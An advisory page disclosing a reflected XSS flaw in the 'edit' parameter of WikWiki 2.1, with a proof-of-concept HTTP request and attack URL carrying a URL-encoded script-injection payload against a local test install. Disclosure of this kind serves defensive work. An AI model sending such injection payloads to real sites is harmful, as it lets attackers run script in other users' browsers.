WikWiki 2.1 Cross Site Scripting

2016.08.03

Credit: HaHwul

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

# Exploit Title: WikWiki - Reflected XSS
# Date: 2016-08-01
# Exploit Author: HaHwul
# Vendor Homepage: https://github.com/smasty/WikWiki
# Software Link: https://github.com/smasty/WikWiki/archive/master.zip
# Version: v2.1
# Tested on: Debian[Whezzy]
# CVE : none

### Vulnerability Point
Edit page is not filtered special char.
Inject html code on root directory and edit parameter.

### Attack Request
GET /?edit=55596317%22%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E94fd7 HTTP/1.1
Host: 127.0.0.1
...snip..

### Attack URL
http://127.0.0.1/vul_test/WikWiki/?edit=55596317%22%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E94fd7

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

WikWiki 2.1 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

WikWiki 2.1 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.